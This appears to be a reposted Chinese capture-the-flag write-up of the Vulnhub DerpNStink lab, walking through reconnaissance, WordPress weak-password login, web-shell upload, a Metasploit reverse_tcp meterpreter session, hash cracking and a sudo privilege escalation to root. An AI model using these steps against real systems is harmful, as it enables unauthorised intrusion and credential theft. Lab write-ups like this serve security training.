攻击机kali:192.168.56.108 靶机derpnstink:192.168.56.114 扫描同网段下存活主机 扫描服务版本信息 开启了21、22、80端口,分别对应着ftp、ssh、Http服务,打开浏览器进行访问
攻击机kali:192.168.56.108
靶机derpnstink:192.168.56.114
扫描同网段下存活主机
扫描服务版本信息
开启了21、22、80端口,分别对应着ftp、ssh、Http服务,打开浏览器进行访问
查看源代码发现flag1和info.txt
点开info.txt
这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西
接着使用工具扫描网站目录,发现了robots.txt文件,WEBlog目录下存在登录页面,PHP目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了
进行访问的时候会发现weblog目录下的都打不开
刚好前面也拿到提示说要在本地添加一个dns记录,
linux系统在/etc/hosts文件中进行添加
添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,
很明显是一个Wordpress的网站
使用awvs扫描网站发现存在弱口令admin/admin
登录到刚刚的网站
登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接
查找配置文件并查看,拿到数据库的用户名和密码
获取数据库用户名和密码的第二种方法:
使用wpscan对wordpress网站进行扫描
发现这个插件存在漏洞,进入msf查看有没有可以利用的模块
发现存在可以利用的模块,直接一把梭拿shell
use 1set payload php/meterpreter/reverse_tcpset rhosts 192.168.56.114set lhost 192.168.56.108set targeturi /weblogset wp_user adminset wp_password admin
shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php
发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个Mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2
同时还发现了另外一个账号密码
将密码的哈希值保存到一个文件里,然后用john进行解密
得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky
尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57
成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件
在Desktop目录发现了flag3
在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码
在shell里切换登录到mrderp,发现不可行
接着尝试使用ssh进行远程连接
连接成功,并在Desktop目录下发现了一个日志文件
打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw
根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了
mkdir binariescd binariesecho “/bin/bash” >> derpy.shchmod +x derpy.shsudo ./derpy.sh
最后在root目录下的Desktop目录找到最后一个flag
来源地址:https://blog.csdn.net/m0_62008601/article/details/128443253
--结束END--
本文标题: Vulnhub:Derpnstink靶机渗透
本文链接: https://lsjlt.com/news/398253.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0